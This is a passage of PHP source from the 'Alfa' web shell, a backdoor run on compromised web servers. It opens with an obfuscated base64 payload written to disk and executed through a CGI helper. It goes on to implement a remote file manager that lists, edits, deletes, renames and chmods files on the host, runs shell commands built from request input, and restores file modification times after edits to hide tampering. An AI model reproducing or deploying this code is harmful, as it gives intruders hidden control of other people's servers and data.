"jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";\r\n\t\t\t$tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);\r\n\t\t\t__alfa_set_cookie("alfachdir_bash", "true");\r\n\t\t\t__alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);\r\n\t\t}\r\n\t\t$dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa \'".addslashes(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\'])."\'");\r\n\t\t$dirContent = json_decode($dirContent, true);\r\n\t\tif(is_array($dirContent)){\r\n\t\t\tarray_pop($dirContent);\r\n\t\t\t$cmd_dir = true;\r\n\t\t}else{\r\n\t\t\t$dirContent = false;\r\n\t\t}\r\n\t}\r\n}\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4);\r\n$count_dirContent = @count($dirContent);\r\nif($count_dirContent > 300){\r\n\t@$_COOKIE["alfa_limited_files"] = 100;\r\n}\r\n$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : \'name\';\r\n$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;\r\n$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;\r\n$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : \'asc\';\r\n$files_page_count = 1;\r\nif($alfa_limited_files > 0){\r\n\t$files_page_count = ceil($count_dirContent/$alfa_limited_files);\r\n\tif($files_page_count > 1){\r\n\t\t$files_page_count++;\r\n\t}\r\n}\r\necho \'<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\\\'alfa_sort_by\\\');" style="color:#25ff00;"><option value="name" \'.($alfa_sort_by == \'name\'?\'selected\':\'\').\'>Name</option><option value="size" \'.($alfa_sort_by == \'size\'?\'selected\':\'\').\'>Size</option><option value="modify" \'.($alfa_sort_by == \'modify\'?\'selected\':\'\').\'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\\\'alfa_filesman_direction\\\')" style="color:#25ff00;"><option value="asc" \'.($alfa_filesman_direction == \'asc\'?\'selected\':\'\').\'>Ascending</option><option value="desc" \'.($alfa_filesman_direction == \'desc\'?\'selected\':\'\').\'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="\'.$alfa_limited_files.\'" oninput="this.value=this.value.replace(/[^0-9]/g,\\\'\\\');setCookie(\\\'alfa_limited_files\\\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">\'.($count_dirContent-1).\'</b></span></div><div class="header">\';\r\nif($dirContent == false){\r\necho \'<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>\';\r\nalfaFooter();\r\nreturn;\r\n}\r\nglobal $sort;\r\n$sort = array(\'name\', 1);\r\nif(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){\r\n\t$sort[0] = $_COOKIE["alfa_sort_by"];\r\n}\r\nif(!empty($_POST[\'alfa1\'])) {\r\nif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'alfa1\'], $match))\r\n$sort = array($match[1], (int)$match[2]);\r\n}\r\nif($alfa_files_page_number > ($files_page_count-1)){\r\n\t$alfa_files_page_number = 1;\r\n}\r\n$checkbox_rand = rand(11111, 99999);\r\necho "<form onsubmit=\'fc(this);return false;\' name=\'files\' method=\'post\'><table id=\'filemanager_table\' width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'><tr><th width=\'13px\'><div class=\'myCheckbox\' style=\'padding-left:0px;\'><input type=\'checkbox\' id=\'mchk".$checkbox_rand."\' onclick=\'checkBox(this);\' class=\'chkbx\'><label for=\'mchk".$checkbox_rand."\'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";\r\n$dirs = $files = array();\r\n$n = $count_dirContent;\r\nif($n > $alfa_limited_files && $alfa_limited_files > 0){\r\n\t$n = ($alfa_limited_files * $alfa_files_page_number);\r\n\tif($n > $count_dirContent){\r\n\t\t$n = $count_dirContent;\r\n\t}\r\n}\r\n$i = 0;\r\nif($alfa_limited_files > 0 && $alfa_files_page_number > 1){\r\n\t$i = $alfa_limited_files * ($alfa_files_page_number - 1);\r\n}\r\n$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);\r\n$cmd_dir_backp = "";\r\nfor(;$i<$n;$i++){\r\nif($cmd_dir){\r\n$filename = $dirContent[$i]["name"];\r\n$file_owner = $dirContent[$i]["owner"];\r\n$file_group = $dirContent[$i]["group"];\r\n$file_modify = @date(\'Y-m-d H:i:s\', $dirContent[$i]["modify"]);\r\n$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);\r\n$file_size = $dirContent[$i]["size"];\r\nif(substr($dirContent[$i]["name"], 0 ,1) == "/"){\r\n$file_path = $dirContent[$i]["name"];\r\n$dirContent[$i]["name"] = "..";\r\n$filename = $dirContent[$i]["name"];\r\n}else{\r\n$file_path = $GLOBALS[\'cwd\']."/".$dirContent[$i]["name"];\r\n}\r\n}else{\r\n$filename = $dirContent[$i];\r\n$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS[\'cwd\'].$filename)):array("name" => "????");\r\n$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS[\'cwd\'].$filename)):array("name" => "????");\r\n$file_owner = $ow[\'name\']?$ow[\'name\']:(function_exists("fileowner")?@fileowner($GLOBALS[\'cwd\'].$filename):"????");\r\n$file_group = $gr[\'name\']?$gr[\'name\']:(function_exists("filegroup")?@filegroup($GLOBALS[\'cwd\'].$filename):"????");\r\n$file_modify = @date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $filename));\r\n$file_perm = alfaPermsColor($GLOBALS[\'cwd\'].$filename);\r\n$file_size = @filesize($GLOBALS[\'cwd\'].$filename);\r\n$file_path = $GLOBALS[\'cwd\'].$filename;\r\n}\r\n$tmp = array(\'name\' => $filename,\r\n\'path\' => $file_path,\r\n\'modify\' => $file_modify,\r\n\'perms\' => $file_perm,\r\n\'size\' => $file_size,\r\n\'owner\' => $file_owner,\r\n\'group\' => $file_group\r\n);\r\nif($filename == ".." && !$cmd_dir){\r\n\t$tmp["path"] = str_replace("\\\\", "/", realpath($file_path));\r\n}\r\nif(!$cmd_dir){\r\nif(@is_file($file_path)){\r\n$arr_mrg = array(\'type\' => \'file\');\r\nif(@is_link($file_path)){\r\n$arr_mrg["link"] = readlink($tmp[\'path\']);\r\n}\r\n$files[] = array_merge($tmp, $arr_mrg);\r\n}elseif(@is_link($file_path)){\r\n$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n}elseif(@is_dir($file_path)&& ($filename != ".")){\r\n$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n}\r\n}else{\r\n\tif($dirContent[$i]["type"]=="file"){\r\n\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t}else{\r\n\t\tif($dirContent[$i]["name"] != "."){\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t\t}\r\n\t}\r\n}\r\n}\r\n$GLOBALS[\'sort\'] = $sort;\r\nfunction alfaCmp($a, $b) {\r\nif($GLOBALS[\'sort\'][0] != \'size\')\r\nreturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\nelse\r\nreturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n}\r\nusort($files, "alfaCmp");\r\nusort($dirs, "alfaCmp");\r\nif(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){\r\n\tif($_COOKIE["alfa_filesman_direction"] == \'desc\'){\r\n\t\t$files = array_reverse($files);\r\n\t\t$dirs = array_reverse($dirs);\r\n\t}\r\n}\r\n$files = array_merge($dirs, $files);\r\n$l=0;\r\n$cc=0;\r\nforeach($files as $f){\r\n$f[\'name\'] = htmlspecialchars($f[\'name\']);\r\n$newname = mb_strlen($f[\'name\'], \'UTF-8\')>60?mb_substr($f[\'name\'], 0, 60, \'utf-8\').\'...\':$f[\'name\'];\r\n$checkbox = \'checkbox_\'.$checkbox_rand.$cc;\r\n$raw_name = rawurlencode($f[\'name\']);\r\n$icon = $GLOBALS[\'DB_NAME\'][\'show_icons\']?\'<img src="\'.findicon($f[\'name\'],$f[\'type\']).\'" width="30" height="30">\':\'\';\r\n$style = $GLOBALS[\'DB_NAME\'][\'show_icons\']?\'position:relative;display:inline-block;bottom:12px;\':\'\';\r\necho \'<tr class="fmanager-row" id="tr_row_\'.$cc.\'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="\'.$raw_name.\'" class="chkbx" id="\'.$checkbox .\'"><label for="\'.$checkbox .\'"></label></div></td><td id="td_row_\'.$cc.\'">\'.$icon.\'<div style="\'.$style.\'"><a row="\'.$cc.\'" id="id_\'.$cc.\'" class="main_name" onclick="\'.(($f[\'type\']==\'file\')?\'editor(\\\'\'.$raw_name.\'\\\',\\\'auto\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\');" href="#action=fileman&path=\'.$GLOBALS[\'cwd\'].\'&file=\'.$raw_name.\'" fname="\'.$raw_name.\'" ftype="file" path="\'.$GLOBALS[\'cwd\'].\'" opt_title="\'.$f[\'link\'].\'" \'.(isset($f[\'link\'])?\'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"\':\'\').\'>\'.($GLOBALS[\'cwd\'].$f[\'name\']==$GLOBALS[\'__file_path\']?"<span class=\'shell_name\' style=\'font-weight:unset;\'>".$f[\'name\']."</span>":htmlspecialchars($newname)):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" href="#action=fileman&path=\'.$f[\'path\'].\'" fname="\'.$raw_name.\'" ftype="folder" path="\'.$GLOBALS[\'cwd\'].\'" opt_title="\'.$f[\'link\'].\'" \'.(isset($f[\'link\'])?\'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"\':\'\').\'><b>| \' . htmlspecialchars($f[\'name\']) . \' |</b>\').\'</a></td></div><td><span style="font-weight:unset;" class="main_size">\'.(($f[\'type\']==\'file\')?(isset($f[\'link\'])?\'[L] \':\'\').alfaSize($f[\'size\']):$f[\'type\']).\'</span></td><td><span style="font-weight:unset;" class="main_modify">\'.$f[\'modify\'].\'</span></td><td><span style="font-weight:unset;" class="main_owner_group">\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</span></td><td><a id="id_chmode_\'.$cc.\'" href=javascript:void(0) onclick="editor(\\\'\'.$raw_name.\'\\\',\\\'chmod\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">\'.\r\n$f[\'perms\'].\'</td><td><a id="id_rename_\'.$cc.\'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'rename\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">R</a> <a id="id_touch_\'.$cc.\'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'touch\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a id="id_edit_\'.$cc.\'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'edit\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">E</a> <a id="id_download_\'.$cc.\'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'.$raw_name.\'\\\', \\\'download\\\')">D</a>\':\'\').\'<a id="id_delete_\'.$cc.\'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\\\'Are You Sure For Delete # \'.addslashes(rawurldecode($f[\'name\'])).\' # ?\\\'); chk ? g(\\\'FilesMan\\\',null,\\\'delete\\\', \\\'\'.$raw_name.\'\\\') : \\\'\\\';"> X </a></td></tr>\';\r\n$l = $l?0:1;\r\n$cc++;\r\n}\r\necho "<tr id=\'filemanager_last_tr\'><td colspan=7>\r\n<input type=hidden name=a value=\'FilesMan\'>\r\n<input type=hidden name=c value=\'".htmlspecialchars(($GLOBALS[\'glob_chdir_false\']?$_POST[\'c\']:$GLOBALS[\'cwd\']))."\'>\r\n<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n<select id=\'tools_selector\' name=\'alfa1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\' selected>Delete</option><option value=\'zip\'>Add 2 Compress (zip)</option><option value=\'unzip\'>Add 2 Uncompress (zip)</option><option value=\'paste\'>Paste / Zip / Unzip </option></select>\r\n<input type=\'submit\' value=\' \'>\r\n</form></table><div class=\'pages-holder\'><div class=\'pages-number\'>".$page_builder."</div></div></div></div>";\r\nalfafooter();\r\n}\r\nfunction get_pagination_links($current_page, $total_pages){\r\n    $links = "";\r\n    if ($total_pages >= 1 && $current_page <= $total_pages) {\r\n\t\t$links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number\\"><<</a>";\r\n\t\t$selected_page = "";\r\n\t\tif($current_page == 1){\r\n\t\t\t$selected_page = " active-page-number";\r\n\t\t}\r\n        $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">1</a>";\r\n        $i = max(2, $current_page - 5);\r\n        if ($i > 2)\r\n            $links .= "<a class=\\"page-number\\">...</a>";\r\n        for (; $i < min($current_page + 6, $total_pages); $i++) {\r\n\t\t\tif($i == $current_page){\r\n\t\t\t\t$selected_page = " active-page-number";\r\n\t\t\t}else{\r\n\t\t\t\t$selected_page = "";\r\n\t\t\t}\r\n            $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">{$i}</a>";\r\n        }\r\n        if ($i != $total_pages)\r\n            $links .= "<a class=\\"page-number\\">...</a>";\r\n\t\t$selected_page = " last-page-number";\r\n\t\tif($current_page == $total_pages){\r\n\t\t\t$selected_page .= " active-page-number";\r\n\t\t}\r\n        $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">{$total_pages}</a>";\r\n\t\t$links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number\\">>></a>";\r\n    }\r\n    return $links;\r\n}\r\nfunction alfaFilesTools(){\r\nalfahead();\r\necho \'<div class="filestools" style="height: 100%;">\';\r\nif(isset($_POST[\'alfa1\']))$_POST[\'alfa1\'] = rawurldecode($_POST[\'alfa1\']);\r\n$alfa1_decoded = $_POST[\'alfa1\'];\r\n$chdir_fals = false;\r\nif(!@chdir($_POST[\'c\'])){\r\n\t$chdir_fals = true;\r\n\t$_POST[\'alfa1\'] = $_POST["c"]."/".$_POST["alfa1"];\r\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\tif($alfa_canruncmd){\r\n\t\t$slashed_alfa1 = addslashes($_POST[\'alfa1\']);\r\n\t\t$file_info = explode(":", alfaEx(\'stat -c "%F:%U:%G:%s:%Y:0%a:%A" "\'.$slashed_alfa1.\'"\'));\r\n\t\t$perm_color_class = alfaEx("if [[ -w \'".$slashed_alfa1."\' ]]; then echo main_green_perm; elif [[ -r \'".$slashed_alfa1."\' ]]; then echo main_white_perm; else echo main_red_perm; fi");\r\n\t}\r\n}\r\nif($_POST[\'alfa2\'] == \'auto\'){\r\nif(is_array(@getimagesize($_POST[\'alfa1\']))){\r\n$_POST[\'alfa2\'] = \'image\';\r\n}else{\r\n\t$_POST[\'alfa2\'] = \'view\';\r\n\tif($chdir_fals){\r\n\t\tif($alfa_canruncmd){\r\n\t\t\t$mime = explode(":", alfaEx("file --mime-type \'".addslashes($_POST[\'alfa1\'])."\'"));\r\n\t\t\t$mimetype = $mime[1];\r\n\t\t\tif(!empty($mimetype)){\r\n\t\t\t\tif(strstr($mimetype, "image")){\r\n\t\t\t\t\t$_POST[\'alfa2\'] = \'image\';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n}\r\nif($_POST[\'alfa2\'] == "rename" && !empty($_POST[\'alfa3\']) && @is_writable($_POST[\'alfa1\'])){$rename_cache = $_POST[\'alfa3\'];}\r\nif(@$_POST[\'alfa2\'] == \'mkfile\'){\r\n$_POST[\'alfa1\'] = trim($_POST[\'alfa1\']);\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\tif(_alfa_is_writable($_POST["c"])){\r\n\t\talfaEx("cd \'".addslashes($_POST["c"])."\';touch \'".addslashes($alfa1_decoded)."\'");\r\n\t\t$_POST[\'alfa2\'] = "edit";\r\n\t}\r\n}\r\nif(!@file_exists($_POST[\'alfa1\'])){\r\n$fp = @fopen($_POST[\'alfa1\'], \'w\');\r\nif($fp){\r\n$_POST[\'alfa2\'] = "edit";\r\nfclose($fp);\r\n}\r\n}else{\r\n$_POST[\'alfa2\'] = "edit";\r\n}\r\n}\r\nif(!_alfa_file_exists(@$_POST[\'alfa1\'])){\r\necho __pre()."<center><p><div class=\\"txtfont\\"><font color=\'red\'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory(\'".$_POST[\'alfa4\']."\');</script>";\r\nalfaFooter();\r\nreturn;\r\n}\r\nif($chdir_fals){\r\n$filesize = $file_info[3];\r\n$uid["name"] = $file_info[1];\r\n$gid["name"] = $file_info[2];\r\n$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);\r\n}else{\r\n$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST[\'alfa1\'])):\'\';\r\n$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST[\'alfa1\'])):\'\';\r\nif(!$uid&&!$gid){\r\n$uid[\'name\'] = function_exists("fileowner")?@fileowner($_POST[\'alfa1\']):\'\';\r\n$gid[\'name\'] = function_exists("filegroup")?@filegroup($_POST[\'alfa1\']):\'\';\r\n}\r\n$permcolor = alfaPermsColor($_POST[\'alfa1\']);\r\n$filesize = @filesize($_POST[\'alfa1\']);\r\nif(!isset($uid[\'name\'],$gid[\'name\'])||empty($uid[\'name\'])||empty($gid[\'name\'])){\r\n\tif(_alfa_can_runCommand()){\r\n\t\tlist($uid[\'name\'],$gid[\'name\']) = explode(":", alfaEx(\'stat -c "%U:%G" "\'.addslashes($_POST["c"]."/".$_POST["alfa1"]).\'"\'));\r\n\t}\r\n}\r\n}\r\nif(substr($_POST[\'alfa1\'], 0, 7) == "phar://"){\r\n\t$alfa_file_directory = $_POST[\'alfa1\'];\r\n}else{\r\n\t$alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST[\'c\'].\'/\').$_POST[\'alfa1\']);\r\n}\r\necho \'<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> \'.htmlspecialchars(basename($alfa1_decoded)).\' <span class="editor_file_info_vars">Size:</span> \'.alfaSize($filesize).\' <span class="editor_file_info_vars">Permission:</span> \'.$permcolor.\' <span class="editor_file_info_vars">Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\' <span class="editor_file_info_vars">Directory:</span> \'.dirname($alfa_file_directory).\'</div>\';\r\nif(empty($_POST[\'alfa2\']))$_POST[\'alfa2\'] = \'view\';\r\nif(!_alfa_is_dir($_POST[\'alfa1\'])){\r\n$m = array(\'View\', \'Download\', \'Highlight\', \'Chmod\', \'Rename\', \'Touch\', \'Delete\', \'Image\', \'Hexdump\');\r\n$ftype = "file";\r\n}else{\r\n$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n$ftype = "dir";\r\n}\r\necho(\'<div>\');\r\nforeach($m as $v)\r\necho $v == \'Delete\' ? \'<a href="javascript:void(0);" onclick="var chk=confirm(\\\'Are You Sure For Delete This File ?\\\');chk?editor(\\\'\'.addslashes(!isset($rename_cache)?$_POST[\'alfa1\']:$rename_cache).\'\\\',\\\'\'.strtolower($v).\'\\\',\\\'\\\',\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\'):\\\'\\\';"><span class="editor_actions">\'.((strtolower($v)==@$_POST[\'alfa2\'])?\'<b><span class="editor_actions"> \'.$v.\' </span> </b>\':$v).\' | </span></a> \' : \'<a href="javascript:void(0);" onclick="editor(\\\'\'.addslashes(!isset($rename_cache)?$_POST[\'alfa1\']:$rename_cache).\'\\\',\\\'\'.strtolower($v).\'\\\',\\\'\\\',\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\')"><span class="editor_actions">\'.((strtolower($v)==@$_POST[\'alfa2\'])?\'<b><span class="editor_actions"> \'.$v.\' </span> </b>\':$v).\' | </span></a>\';\r\necho \'</div>\';\r\nswitch($_POST[\'alfa2\']){\r\ncase \'view\':case \'edit\':\r\n@chdir($_POST[\'c\']);\r\n$disabled_btn = "";\r\nif(!@is_writable($_POST[\'alfa1\'])&&!_alfa_is_writable($_POST[\'alfa1\'])){\r\n$disabled_btn = "disabled=disabled";\r\n$disabled_btn_style= \'background: #ff0000;color: #fff;\';\r\n}\r\nif(!empty($_POST[\'alfa3\'])){\r\n$_POST[\'alfa3\'] = substr($_POST[\'alfa3\'],1);\r\n$time = @filemtime($_POST[\'alfa1\']);\r\n$fp = @__write_file($_POST[\'alfa1\'],$_POST[\'alfa3\']);\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\t$rname = $alfa1_decoded;\r\n\t$randname = $rname.rand(111,9999);\r\n\t$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;\r\n\tif($fp = @__write_file($filepath ,$_POST[\'alfa3\'])){\r\n\t\talfaEx("mv \'".addslashes($filepath)."\' \'".addslashes($_POST["alfa1"])."\';rm -f \'".addslashes($filepath)."\'");\r\n\t}\r\n}\r\nif($fp){\r\necho \'Saved!<br>\';\r\n@touch($_POST[\'alfa1\'],$time,$time);\r\n}\r\n}\r\necho \'<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">\'._alfa_load_ace_options("editor").\'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\\\'ace_id\\\')].getValue();editor(\\\'\'.addslashes($alfa1_decoded).\'\\\',\\\'edit\\\',\\\'1\\\'+ace_val,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;\'.$disabled_btn_style.\'" \'.$disabled_btn.\'>save</button></div><pre class="ml1 view_ml_content">\';\r\necho htmlspecialchars(__read_file($_POST[\'alfa1\']));\r\necho \'</pre></div></div>\';\r\nbreak;\r\ncase \'highlight\':\r\n@chdir($_POST[\'c\']);\r\nif(@is_readable($_POST[\'alfa1\'])){\r\necho \'<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">\';\r\n$code = @highlight_file($_POST[\'alfa1\'],true);\r\necho str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div></div></div>\';\r\n}\r\nbreak;\r\ncase \'delete\':\r\n@chdir($_POST[\'c\']);\r\nif(@is_writable($_POST[\'alfa1\'])||$GLOBALS["glob_chdir_false"]){\r\n$deleted = true;\r\nif(!@unlink($_POST[\'alfa1\'])){\r\n\t$deleted = false;\r\n\tif($alfa_canruncmd){\r\n\t\tif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n\t\t\talfaEx("rm -f \'".addslashes($_POST[\'alfa1\'])."\'");\r\n\t\t\t$deleted = true;\r\n\t\t}\r\n\t}\r\n}\r\nif($deleted)echo \'File Deleted...<script>var elem = $("\'.$_POST[\'alfa4\'].\'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["\'.$_POST[\'alfa4\'].\'"];</script>\';else echo \'Error...\';}\r\nbreak;\r\ncase \'chmod\':\r\n@chdir($_POST[\'c\']);\r\nif(!empty($_POST[\'alfa3\'])){\r\n$perms = 0;\r\nfor($i=strlen($_POST[\'alfa3\'])-1;$i>=0;--$i)\r\n$perms += (int)$_POST[\'alfa3\'][$i]*pow(8, (strlen($_POST[\'alfa3\'])-$i-1));\r\nif(!@chmod($_POST[\'alfa1\'], $perms)){\r\nif($chdir_fals&&$alfa_canruncmd){\r\nalfaEx("cd \'".addslashes($_POST["c"])."\';chmod ".addslashes($_POST[\'alfa3\'])." \'".addslashes($alfa1_decoded)."\'");\r\necho(\'Success!\');\r\n}else{\r\necho \'<font color="#FFFFFF"><b>Can\\\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>\';}\r\n}else{echo(\'Success!\');}\r\n}\r\nclearstatcache();\r\nAlfaNum(8,9,10,7,6,5,4,2,1);\r\nif($chdir_fals){\r\n\t$file_perm = $file_info[5];\r\n}else{\r\n\t$file_perm = substr(sprintf(\'%o\', @fileperms($_POST[\'alfa1\'])),-4);\r\n}\r\necho \'<script>alfa3_="";</script><form onsubmit="editor(\\\'\'.addslashes($_POST[\'alfa1\']).\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.chmod.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type="text" name="chmod" value="\'.$file_perm.\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'hexdump\':\r\n@chdir($_POST[\'c\']);\r\n$c = __read_file($_POST[\'alfa1\']);\r\n$n = 0;\r\n$h = array(\'00000000<br>\',\'\',\'\');\r\n$len = strlen($c);\r\nfor ($i=0; $i<$len; ++$i) {\r\n$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\nswitch ( ord($c[$i]) ) {\r\ncase 0: $h[2] .= \' \'; break;\r\ncase 9: $h[2] .= \' \'; break;\r\ncase 10: $h[2] .= \' \'; break;\r\ncase 13: $h[2] .= \' \'; break;\r\ndefault: $h[2] .= $c[$i]; break;\r\n}\r\n$n++;\r\nif ($n == 32) {\r\n$n = 0;\r\nif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n$h[1] .= \'<br>\';\r\n$h[2] .= "\\n";\r\n}\r\n}\r\necho \'<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table></div></div>\';\r\nbreak;\r\ncase \'rename\':\r\n@chdir($_POST[\'c\']);\r\n$alfa1_escape = addslashes($_POST["alfa1"]);\r\n$alfa3_escape = addslashes($_POST["alfa3"]);\r\nif(!empty($_POST[\'alfa3\'])){\r\n$cmd_rename = 